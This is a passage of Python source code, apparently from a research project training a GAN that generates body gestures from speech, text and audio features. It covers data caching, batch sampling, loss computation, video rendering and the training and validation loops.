print('Caching {} data {:>6}/{}.'.format(part, 0, num_samples), end='')
for k in range(num_samples):
with data_s2ag.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# with data_s2ag.lmdb_env.begin(write=False) as txn:
# key = '{:010}'.format(k).encode('ascii')
# sample = txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
duration = aux_info['end_time'] - aux_info['start_time']
audio_max_all[k] = np.max(np.abs(audio))
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time).detach().cpu().numpy()
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float().detach().cpu().numpy()
extended_word_seq_all[k] = extended_word_seq
vec_seq_all[k] = vec_seq
audio_all[k] = np.int16(audio / audio_max_all[k] * 32767)
mfcc_features_all[k] = mfcc_features
vid_indices_all[k] = speaker_model.word2index[aux_info['vid']]
np.savez_compressed(jn(dir_name, part, str(k).zfill(6) + '.npz'),
extended_word_seq=extended_word_seq,
vec_seq=vec_seq,
audio=np.int16(audio / audio_max_all[k] * 32767),
audio_max=audio_max_all[k],
mfcc_features=mfcc_features,
vid_indices=vid_indices_all[k])
print('\rCaching {} data {:>6}/{}.'.format(part, k + 1, num_samples), end='')
print('\t Storing full cache', end='')
full_cache_path = jn(dir_name, '../full')
os.makedirs(full_cache_path, exist_ok=True)
np.savez_compressed(jn(full_cache_path, part + '.npz'),
extended_word_seq=extended_word_seq_all,
vec_seq=vec_seq_all, audio=audio_all, audio_max=audio_max_all,
mfcc_features=mfcc_features_all,
vid_indices=vid_indices_all)
print(' done.')
def process_data(self, data, poses, quat, trans, affs):
data = data.float().to(self.device)
poses = poses.float().to(self.device)
quat = quat.float().to(self.device)
trans = trans.float().to(self.device)
affs = affs.float().to(self.device)
return data, poses, quat, trans, affs
def load_model_at_epoch(self, epoch='best'):
model_name, self.best_s2eg_loss_epoch, self.best_s2eg_loss = \
get_epoch_and_loss(self.args.work_dir_s2eg, epoch=epoch)
model_found = False
try:
loaded_vars = torch.load(jn(self.args.work_dir_s2eg, model_name))
self.s2eg_generator.load_state_dict(loaded_vars['gen_model_dict'])
self.s2eg_discriminator.load_state_dict(loaded_vars['dis_model_dict'])
model_found = True
except (FileNotFoundError, IsADirectoryError):
if epoch == 'best':
print('Warning! No saved model found.')
else:
print('Warning! No saved model found at epoch {}.'.format(epoch))
return model_found
def adjust_lr_s2eg(self):
self.lr_s2eg_gen = self.lr_s2eg_gen * self.args.lr_s2eg_decay
for param_group in self.s2eg_gen_optimizer.param_groups:
param_group['lr'] = self.lr_s2eg_gen
self.lr_s2eg_dis = self.lr_s2eg_dis * self.args.lr_s2eg_decay
for param_group in self.s2eg_dis_optimizer.param_groups:
param_group['lr'] = self.lr_s2eg_dis
def show_epoch_info(self):
best_metrics = [self.best_s2eg_loss]
print_epochs = [self.best_s2eg_loss_epoch
if self.best_s2eg_loss_epoch is not None else 0] * len(best_metrics)
i = 0
for k, v in self.epoch_info.items():
self.io.print_log('\t{}: {}. Best so far: {:.4f} (epoch: {:d}).'.
format(k, v, best_metrics[i], print_epochs[i]))
i += 1
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.epoch_info)
def show_iter_info(self):
if self.meta_info['iter'] % self.args.log_interval == 0:
info = '\tIter {} Done.'.format(self.meta_info['iter'])
for k, v in self.iter_info.items():
if isinstance(v, float):
info = info + ' | {}: {:.4f}'.format(k, v)
else:
info = info + ' | {}: {}'.format(k, v)
self.io.print_log(info)
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.iter_info)
def count_parameters(self):
return sum(p.numel() for p in self.s2eg_generator.parameters() if p.requires_grad)
@staticmethod
def extend_word_seq(n_frames, lang, remove_word_timing, words, aux_info, end_time=None):
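        # Map each word to a frame index derived from its start time (or space the words evenly
        # over the clip when remove_word_timing is set) and store its vocabulary index there.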
if end_time is None:
end_time = aux_info['end_time']
frame_duration = (end_time - aux_info['start_time']) / n_frames
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
if remove_word_timing:
n_words = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
n_words += 1
space = int(n_frames / (n_words + 1))
for word_idx in range(n_words):
idx = (word_idx + 1) * space
extended_word_indices[idx] = lang.get_word_index(words[word_idx][0])
else:
prev_idx = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
extended_word_indices[idx] = lang.get_word_index(word[0])
# extended_word_indices[prev_idx:idx+1] = lang.get_word_index(word[0])
prev_idx = idx
return torch.Tensor(extended_word_indices).long()
@staticmethod
def words_to_tensor(lang, words, end_time=None):
indexes = [lang.SOS_token]
for word in words:
if end_time is not None and word[1] > end_time:
break
indexes.append(lang.get_word_index(word[0]))
indexes.append(lang.EOS_token)
return torch.Tensor(indexes).long()
def yield_batch_old(self, train):
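        # Legacy batching path kept for reference: it expects the older cache layout
        # ('word_seq', 'pose_seq', 'aux_info' keys) and appears to be superseded by yield_batch below.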
batch_word_seq_tensor = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(self.args.batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((self.args.batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((self.args.batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((self.args.batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((self.args.batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((self.args.batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
batch_vid_indices = torch.zeros(self.args.batch_size).long().to(self.device)
if train:
data_s2eg = self.data_loader['train_data_s2eg']
num_data = self.num_train_samples
else:
data_s2eg = self.data_loader['val_data_s2eg']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
# def load_from_txn(_txn, _i, _k):
# key = '{:010}'.format(_k).encode('ascii')
# sample = _txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
#
# # vid_name = sample[-1]['vid']
# # clip_start = str(sample[-1]['start_time'])
# # clip_end = str(sample[-1]['end_time'])
#
# duration = aux_info['end_time'] - aux_info['start_time']
# do_clipping = True
#
# if do_clipping:
# sample_end_time = aux_info['start_time'] + duration * data_s2eg.n_poses / vec_seq.shape[0]
# audio = make_audio_fixed_length(audio, self.audio_length)
# spectrogram = spectrogram[:, 0:self.spectrogram_length]
# mfcc_features = mfcc_features[:, 0:self.mfcc_length]
# vec_seq = vec_seq[0:data_s2eg.n_poses]
# pose_seq = pose_seq[0:data_s2eg.n_poses]
# else:
# sample_end_time = None
#
# # to tensors
# word_seq_tensor = Processor.words_to_tensor(data_s2eg.lang_model, word_seq, sample_end_time)
# extended_word_seq = Processor.extend_word_seq(data_s2eg.n_poses, data_s2eg.lang_model,
# data_s2eg.remove_word_timing, word_seq,
# aux_info, sample_end_time)
# vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
# pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# # scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
# mfcc_features = torch.from_numpy(mfcc_features).float()
# audio = torch.from_numpy(audio).float()
# spectrogram = torch.from_numpy(spectrogram)
#
# batch_word_seq_tensor[_i, :len(word_seq_tensor)] = word_seq_tensor
# batch_word_seq_lengths[_i] = len(word_seq_tensor)
# batch_extended_word_seq[_i] = extended_word_seq
# batch_pose_seq[_i] = pose_seq
# batch_vec_seq[_i] = vec_seq
# batch_audio[_i] = audio
# batch_spectrogram[_i] = spectrogram
# batch_mfcc[_i] = mfcc_features
# # speaker input
# if train:
# if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
# else:
# if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
for i, k in enumerate(rand_keys):
if train:
word_seq = self.train_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.train_samples['pose_seq'][k]
vec_seq = self.train_samples['vec_seq'][k]
audio = self.train_samples['audio'][k] / 32767 * self.train_samples['audio_max'][k]
mfcc_features = self.train_samples['mfcc_features'][k]
aux_info = self.train_samples['aux_info'].item()[str(k).zfill(6)]
else:
word_seq = self.val_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.val_samples['pose_seq'][k]
vec_seq = self.val_samples['vec_seq'][k]
audio = self.val_samples['audio'][k] / 32767 * self.val_samples['audio_max'][k]
mfcc_features = self.val_samples['mfcc_features'][k]
aux_info = self.val_samples['aux_info'].item()[str(k).zfill(6)]
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2eg.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2eg.n_poses]
pose_seq = pose_seq[0:data_s2eg.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2eg.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2eg.n_poses, data_s2eg.lang_model,
data_s2eg.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
mfcc_features = torch.from_numpy(mfcc_features).float()
audio = torch.from_numpy(audio).float()
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_audio[i] = audio
batch_mfcc[i] = mfcc_features
# speaker input
if train:
if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
else:
if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
# with data_s2eg.lmdb_env.begin(write=False) as txn:
# threads = []
# for i, k in enumerate(rand_keys):
# threads.append(threading.Thread(target=load_from_txn, args=[i, k]))
# threads[i].start()
# for i in range(len(rand_keys)):
# threads[i].join()
yield batch_word_seq_tensor, batch_word_seq_lengths, batch_extended_word_seq, batch_pose_seq, \
batch_vec_seq, batch_audio, batch_spectrogram, batch_mfcc, batch_vid_indices
def yield_batch(self, train):
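        # Sample batches uniformly at random from the pre-cached npz arrays; speaker ids are
        # drawn from the speaker vocabulary excluding each sampled clip's own id.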
if train:
data_s2eg = self.data_loader['train_data_s2eg']
num_data = self.num_train_samples
else:
data_s2eg = self.data_loader['val_data_s2eg']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
if train:
batch_extended_word_seq = torch.from_numpy(
self.train_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.train_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.train_samples['audio'][rand_keys] *
self.train_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.train_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.train_samples['vid_indices'][rand_keys]
else:
batch_extended_word_seq = torch.from_numpy(
self.val_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.val_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.val_samples['audio'][rand_keys] *
self.val_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.val_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.val_samples['vid_indices'][rand_keys]
# speaker input
batch_vid_indices = None
if train and self.train_speaker_model and\
self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.train_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
elif self.val_speaker_model and\
self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.val_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
yield batch_extended_word_seq, batch_vec_seq, batch_audio, batch_mfcc_features, batch_vid_indices
def return_batch(self, batch_size, randomized=True):
data_s2eg = self.data_loader['test_data_s2eg']
if len(batch_size) > 1:
rand_keys = np.copy(batch_size)
batch_size = len(batch_size)
else:
batch_size = batch_size[0]
prob_dist = np.ones(self.num_test_samples) / float(self.num_test_samples)
if randomized:
rand_keys = np.random.choice(self.num_test_samples, size=batch_size, replace=False, p=prob_dist)
else:
rand_keys = np.arange(batch_size)
batch_words = [[] for _ in range(batch_size)]
batch_aux_info = [[] for _ in range(batch_size)]
batch_word_seq_tensor = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_target_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
for i, k in enumerate(rand_keys):
with data_s2eg.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# for selected_vi in range(len(word_seq)): # make start time of input text zero
# word_seq[selected_vi][1] -= aux_info['start_time'] # start time
# word_seq[selected_vi][2] -= aux_info['start_time'] # end time
            batch_words[i] = [word[0] for word in word_seq]
batch_aux_info[i] = aux_info
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2eg.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
spectrogram = spectrogram[:, 0:self.spectrogram_length]
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2eg.n_poses]
pose_seq = pose_seq[0:data_s2eg.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2eg.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2eg.n_poses, data_s2eg.lang_model,
data_s2eg.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
target_seq = convert_pose_seq_to_dir_vec(pose_seq)
target_seq = target_seq.reshape(target_seq.shape[0], -1)
target_seq -= np.reshape(self.s2eg_config_args.mean_dir_vec, -1)
mfcc_features = torch.from_numpy(mfcc_features)
audio = torch.from_numpy(audio).float()
spectrogram = torch.from_numpy(spectrogram)
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_target_seq[i] = torch.from_numpy(target_seq).float()
batch_audio[i] = audio
batch_spectrogram[i] = spectrogram
batch_mfcc[i] = mfcc_features
# speaker input
# if self.test_speaker_model and self.test_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[i] = \
# torch.LongTensor([self.test_speaker_model.word2index[aux_info['vid']]])
batch_vid_indices = torch.LongTensor(
[np.random.choice(list(self.test_speaker_model.word2index.values()))
for _ in range(batch_size)]).to(self.device)
return batch_words, batch_aux_info, batch_word_seq_tensor, batch_word_seq_lengths, \
batch_extended_word_seq, batch_pose_seq, batch_vec_seq, batch_target_seq, batch_audio, \
batch_spectrogram, batch_mfcc, batch_vid_indices
@staticmethod
def add_noise(data):
noise = torch.randn_like(data) * 0.1
return data + noise
@staticmethod
def push_samples(evaluator, target, out_dir_vec, in_text_padded, in_audio,
losses_all, joint_mae, accel, mean_dir_vec, n_poses, n_pre_poses):
batch_size = len(target)
# if evaluator:
# evaluator.reset()
loss = F.l1_loss(out_dir_vec, target)
losses_all.update(loss.item(), batch_size)
if evaluator:
evaluator.push_samples(in_text_padded, in_audio, out_dir_vec, target)
# calculate MAE of joint coordinates
out_dir_vec_np = out_dir_vec.detach().cpu().numpy()
out_dir_vec_np += np.array(mean_dir_vec).squeeze()
out_joint_poses = convert_dir_vec_to_pose(out_dir_vec_np)
target_vec = target.detach().cpu().numpy()
target_vec += np.array(mean_dir_vec).squeeze()
target_poses = convert_dir_vec_to_pose(target_vec)
if out_joint_poses.shape[1] == n_poses:
diff = out_joint_poses[:, n_pre_poses:] - \
target_poses[:, n_pre_poses:]
else:
diff = out_joint_poses - target_poses[:, n_pre_poses:]
mae_val = np.mean(np.absolute(diff))
joint_mae.update(mae_val, batch_size)
# accel
target_acc = np.diff(target_poses, n=2, axis=1)
out_acc = np.diff(out_joint_poses, n=2, axis=1)
accel.update(np.mean(np.abs(target_acc - out_acc)), batch_size)
return evaluator, losses_all, joint_mae, accel
def forward_pass_s2eg(self, in_text, in_audio, in_mfcc, target_poses, vid_indices, train,
target_seq=None, words=None, aux_info=None, save_path=None, make_video=False,
calculate_metrics=False, losses_all_trimodal=None, joint_mae_trimodal=None,
accel_trimodal=None, losses_all=None, joint_mae=None, accel=None):
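        # One GAN step: run the discriminator pass (past the warm-up epochs), then the generator
        # pass with Huber regression plus optional KLD/diversity regularizers and the adversarial
        # term, stepping the optimizers when train is True; optionally renders comparison videos,
        # accumulates evaluation metrics, and returns the L1 gap to the trimodal baseline.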
warm_up_epochs = self.s2eg_config_args.loss_warmup
use_noisy_target = False
# make pre seq input
pre_seq = target_poses.new_zeros((target_poses.shape[0], target_poses.shape[1],
target_poses.shape[2] + 1))
pre_seq[:, 0:self.s2eg_config_args.n_pre_poses, :-1] =\
target_poses[:, 0:self.s2eg_config_args.n_pre_poses]
pre_seq[:, 0:self.s2eg_config_args.n_pre_poses, -1] = 1 # indicating bit for constraints
###########################################################################################
# train D
dis_error = None
if self.meta_info['epoch'] > warm_up_epochs and self.s2eg_config_args.loss_gan_weight > 0.0:
self.s2eg_dis_optimizer.zero_grad()
# out shape (batch x seq x dim)
if self.use_mfcc:
out_dir_vec, *_ = self.s2eg_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, *_ = self.s2eg_generator(pre_seq, in_text, in_audio, vid_indices)
if use_noisy_target:
noise_target = Processor.add_noise(target_poses)
noise_out = Processor.add_noise(out_dir_vec.detach())
dis_real = self.s2eg_discriminator(noise_target, in_text)
dis_fake = self.s2eg_discriminator(noise_out, in_text)
else:
dis_real = self.s2eg_discriminator(target_poses, in_text)
dis_fake = self.s2eg_discriminator(out_dir_vec.detach(), in_text)
dis_error = torch.sum(-torch.mean(torch.log(dis_real + 1e-8) + torch.log(1 - dis_fake + 1e-8))) # ns-gan
if train:
dis_error.backward()
self.s2eg_dis_optimizer.step()
###########################################################################################
# train G
self.s2eg_gen_optimizer.zero_grad()
# decoding
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq, in_text, in_audio, vid_indices)
if self.use_mfcc:
out_dir_vec, z, z_mu, z_log_var = self.s2eg_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, z, z_mu, z_log_var = self.s2eg_generator(pre_seq, in_text, in_audio, vid_indices)
# make a video
assert not make_video or (make_video and target_seq is not None), \
'target_seq cannot be None when make_video is True'
assert not make_video or (make_video and words is not None), \
'words cannot be None when make_video is True'
assert not make_video or (make_video and aux_info is not None), \
'aux_info cannot be None when make_video is True'
assert not make_video or (make_video and save_path is not None), \
'save_path cannot be None when make_video is True'
if make_video:
sentence_words = []
for word in words:
sentence_words.append(word)
sentences = [' '.join(sentence_word) for sentence_word in sentence_words]
num_videos = len(aux_info)
for vid_idx in range(num_videos):
start_time = time.time()
filename_prefix = '{}_{}'.format(aux_info[vid_idx]['vid'], vid_idx)
filename_prefix_for_video = filename_prefix
aux_str = '({}, time: {}-{})'.format(aux_info[vid_idx]['vid'],
str(datetime.timedelta(
seconds=aux_info[vid_idx]['start_time'])),
str(datetime.timedelta(
seconds=aux_info[vid_idx]['end_time'])))
create_video_and_save(
save_path, 0, filename_prefix_for_video, 0,
target_seq[vid_idx].cpu().numpy(),
out_dir_vec_trimodal[vid_idx].cpu().numpy(), out_dir_vec[vid_idx].cpu().numpy(),
np.reshape(self.s2eg_config_args.mean_dir_vec, -1), sentences[vid_idx],
audio=in_audio[vid_idx].cpu().numpy(), aux_str=aux_str,
clipping_to_shortest_stream=True, delete_audio_file=False)
print('\rRendered {} of {} videos. Last one took {:.2f} seconds.'.format(vid_idx + 1,
num_videos,
time.time() - start_time),
end='')
print()
# calculate metrics
assert not calculate_metrics or (calculate_metrics and target_seq is not None), \
'target_seq cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and losses_all_trimodal is not None), \
'losses_all_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and joint_mae_trimodal is not None), \
'joint_mae_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and accel_trimodal is not None), \
'accel_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and losses_all is not None), \
'losses_all cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and joint_mae is not None), \
'joint_mae cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and accel is not None), \
'accel cannot be None when calculate_metrics is True'
if calculate_metrics:
self.evaluator_trimodal, losses_all_trimodal, joint_mae_trimodal, accel_trimodal =\
Processor.push_samples(self.evaluator_trimodal, target_seq, out_dir_vec_trimodal,
in_text, in_audio, losses_all_trimodal, joint_mae_trimodal, accel_trimodal,
self.s2eg_config_args.mean_dir_vec, self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
self.evaluator, losses_all, joint_mae, accel =\
Processor.push_samples(self.evaluator, target_seq, out_dir_vec,
in_text, in_audio, losses_all, joint_mae, accel,
self.s2eg_config_args.mean_dir_vec, self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
# loss
beta = 0.1
huber_loss = F.smooth_l1_loss(out_dir_vec / beta, target_poses / beta) * beta
dis_output = self.s2eg_discriminator(out_dir_vec, in_text)
gen_error = -torch.mean(torch.log(dis_output + 1e-8))
kld = div_reg = None
if (self.s2eg_config_args.z_type == 'speaker' or self.s2eg_config_args.z_type == 'random') and \
self.s2eg_config_args.loss_reg_weight > 0.0:
if self.s2eg_config_args.z_type == 'speaker':
# enforcing divergent gestures btw original vid and other vid
rand_idx = torch.randperm(vid_indices.shape[0])
rand_vids = vid_indices[rand_idx]
else:
rand_vids = None
if self.use_mfcc:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2eg_generator(pre_seq, in_text, in_mfcc, rand_vids)
else:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2eg_generator(pre_seq, in_text, in_audio, rand_vids)
beta = 0.05
pose_l1 = F.smooth_l1_loss(out_dir_vec / beta, out_dir_vec_rand_vid.detach() / beta,
reduction='none') * beta
pose_l1 = pose_l1.sum(dim=1).sum(dim=1)
pose_l1 = pose_l1.view(pose_l1.shape[0], -1).mean(1)
z_l1 = F.l1_loss(z.detach(), z_rand_vid.detach(), reduction='none')
z_l1 = z_l1.view(z_l1.shape[0], -1).mean(1)
div_reg = -(pose_l1 / (z_l1 + 1.0e-5))
div_reg = torch.clamp(div_reg, min=-1000)
div_reg = div_reg.mean()
if self.s2eg_config_args.z_type == 'speaker':
# speaker embedding KLD
kld = -0.5 * torch.mean(1 + z_log_var - z_mu.pow(2) - z_log_var.exp())
loss = self.s2eg_config_args.loss_regression_weight * huber_loss + \
self.s2eg_config_args.loss_kld_weight * kld + \
self.s2eg_config_args.loss_reg_weight * div_reg
else:
loss = self.s2eg_config_args.loss_regression_weight * huber_loss + \
self.s2eg_config_args.loss_reg_weight * div_reg
else:
loss = self.s2eg_config_args.loss_regression_weight * huber_loss # + var_loss
if self.meta_info['epoch'] > warm_up_epochs:
loss += self.s2eg_config_args.loss_gan_weight * gen_error
if train:
loss.backward()
self.s2eg_gen_optimizer.step()
loss_dict = {'loss': self.s2eg_config_args.loss_regression_weight * huber_loss.item()}
if kld:
loss_dict['KLD'] = self.s2eg_config_args.loss_kld_weight * kld.item()
if div_reg:
loss_dict['DIV_REG'] = self.s2eg_config_args.loss_reg_weight * div_reg.item()
if self.meta_info['epoch'] > warm_up_epochs and self.s2eg_config_args.loss_gan_weight > 0.0:
loss_dict['gen'] = self.s2eg_config_args.loss_gan_weight * gen_error.item()
loss_dict['dis'] = dis_error.item()
# total_loss = 0.
# for loss in loss_dict.keys():
# total_loss += loss_dict[loss]
# return loss_dict, losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
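        # The scalar returned first is the L1 gap between our prediction and the trimodal baseline
        # (ours minus baseline), so negative values mean our output is closer to the ground truth.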
return F.l1_loss(out_dir_vec, target_poses).item() - F.l1_loss(out_dir_vec_trimodal, target_poses).item(),\
losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
def per_train_epoch(self):
self.s2eg_generator.train()
self.s2eg_discriminator.train()
batch_s2eg_loss = 0.
num_batches = self.num_train_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=True):
loss, *_ = self.forward_pass_s2eg(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=True)
# Compute statistics
batch_s2eg_loss += loss
self.iter_info['s2eg_loss'] = loss
self.iter_info['lr_gen'] = '{}'.format(self.lr_s2eg_gen)
self.iter_info['lr_dis'] = '{}'.format(self.lr_s2eg_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2eg_loss /= num_batches
self.epoch_info['mean_s2eg_loss'] = batch_s2eg_loss
self.show_epoch_info()
self.io.print_timer()
# self.adjust_lr_s2eg()
def per_val_epoch(self):
self.s2eg_generator.eval()
self.s2eg_discriminator.eval()
batch_s2eg_loss = 0.
num_batches = self.num_val_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=False):
with torch.no_grad():
loss, *_ = self.forward_pass_s2eg(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False)
# Compute statistics
batch_s2eg_loss += loss
self.iter_info['s2eg_loss'] = loss
self.iter_info['lr_gen'] = '{:.6f}'.format(self.lr_s2eg_gen)
self.iter_info['lr_dis'] = '{:.6f}'.format(self.lr_s2eg_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2eg_loss /= num_batches
self.epoch_info['mean_s2eg_loss'] = batch_s2eg_loss
if self.epoch_info['mean_s2eg_loss'] < self.best_s2eg_loss and \
self.meta_info['epoch'] > self.min_train_epochs:
self.best_s2eg_loss = self.epoch_info['mean_s2eg_loss']
